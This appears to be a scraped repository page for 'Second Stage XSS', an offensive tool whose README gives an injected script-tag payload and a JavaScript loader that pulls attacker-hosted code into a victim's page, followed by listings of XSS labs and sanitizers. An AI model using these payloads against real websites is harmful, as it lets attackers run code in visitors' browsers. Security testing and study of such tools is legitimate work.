Second Stage XSS

Related tags

Miscellaneous SSX
Overview

SSX

Second Stage XSS, This tool will help you to exploit XSS more deeply.

Installation:

  1. Clone this project
  2. This app need permission to write on current directory, for creating and update log
  3. Change base URL in file en.js with your server address, example
var base_url = "https://yourweb/ssx/ping.php";

How to use:

Send payload XSS and pointing to your server, such as: <script src=//yourserver/en.js></script>

You can integrate with xss hunter or EzXSS by adding a secondary payload as follows:

var js = document.createElement("script");
js.type = "text/javascript";
js.src = "https://yourserver/en.js";
document.body.appendChild(js);

More info: https://dimazarno.medium.com/second-stage-xss-ssx-cd42d6e519c5

Please don't install it on a production server, and use it wisely, I am not responsible if there is damage / loss using this tool !!

Happy hunting!

You might also like...
A simple place to learn XSS
A simple place to learn XSS

XSSPlayground A simple place to learn XSS. Made for myself to learn and to help others (please do use!) Disclaimer This is a works in progress and wil

XSS, CSRF, SQLi, RFI attacks/defences in eClass site.

Open eClass 2.3 Disclaimer This repository contained a vulnerable version of eclass (check very first commit for initial version, if you want to exper

Test a method against a list of XSS known.

php-xss-tests Test a method against a list of XSS known. How to run Just execute "run.sh", it will start a docker container to do all stuff. How I kno

HTML sanitizer, written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values.

TYPO3 HTML Sanitizer ℹ️ Common safe HTML tags & attributes as given in \TYPO3\HtmlSanitizer\Builder\CommonBuilder still might be adjusted, extended or

This website for web pentesters and beginner bug bounty hunters,You can improve your hacking skills by practicing xss in this lab.

XSSLab [Not finished yet, it's under development] XSSLab is a vulnerable website coded By Mahdi Jaber "Mr MJT" {in digital world}.. By XSSLab you can

Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campbell/security-core
Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campbell/security-core

Laravel Security Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campb

A wrapper of voku/anti-xss for Laravel
A wrapper of voku/anti-xss for Laravel

Laravel Security Laravel Security was created by, and is maintained by Graham Campbell, and is a voku/anti-xss wrapper for Laravel, using graham-campb

HTML sanitizer, written in PHP, aiming to provide XSS-safe markup based on explicitly allowed tags, attributes and values.

TYPO3 HTML Sanitizer ℹ️ Common safe HTML tags & attributes as given in \TYPO3\HtmlSanitizer\Builder\CommonBuilder still might be adjusted, extended or

Owner
Dimaz Arno
Dimaz Arno
X1 - A very simple web based note solution that's designed to serve as my second brain.

X1 A very simple web based note solution that's designed to serve as my second brain. Starting Server To start the tool simply clone the repo and then

Joel Dare 118 Dec 28, 2022
Compares two directories and removes the duplicate files from the second directory.

How does the HRZ Duplicate Refiner work? 1- Compares two directories : patternDir: the directory used as the pattern & does not change. victimDir: A d

Hamidreza Zolfaghar 2 May 6, 2022
A simple place to learn XSS

XSSPlayground A simple place to learn XSS. Made for myself to learn and to help others (please do use!) Disclaimer This is a works in progress and wil

ac1d 23 Jun 21, 2022
This website for web pentesters and beginner bug bounty hunters,You can improve your hacking skills by practicing xss in this lab.

XSSLab [Not finished yet, it's under development] XSSLab is a vulnerable website coded By Mahdi Jaber "Mr MJT" {in digital world}.. By XSSLab you can

Mr MJT [Mahdi Jaber] 7 Aug 30, 2022
Dobren Dragojević 6 Jun 11, 2023
Sri Lanka Grade Exam Results Bot 📚 can collect Grade 5 O/L A/L Exam Results 📚 in Second Powerd By Sri lanka Department Of Examination 🚀

Sri-Lanka-Exam-Results-Telegram-Bot How to use the bot /start : Start Sri Lanka Grade 5 O/L A/L Exam Results Bot. /help : More information about Sri L

GD Hiruna 8 Oct 2, 2022
X1 - A very simple web based note solution that's designed to serve as my second brain.

X1 A very simple web based note solution that's designed to serve as my second brain. Starting Server To start the tool simply clone the repo and then

Joel Dare 118 Dec 28, 2022
Compares two directories and removes the duplicate files from the second directory.

How does the HRZ Duplicate Refiner work? 1- Compares two directories : patternDir: the directory used as the pattern & does not change. victimDir: A d

Hamidreza Zolfaghar 2 May 6, 2022
㊙️ AntiXSS | Protection against Cross-site scripting (XSS) via PHP

㊙️ AntiXSS "Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inje

Lars Moelleken 570 Dec 16, 2022
PHP Template Attribute Language — template engine for XSS-proof well-formed XHTML and HTML5 pages

PHPTAL - Template Attribute Language for PHP Requirements If you want to use the builtin internationalisation system (I18N), the php-gettext extension

PHPTAL 175 Dec 13, 2022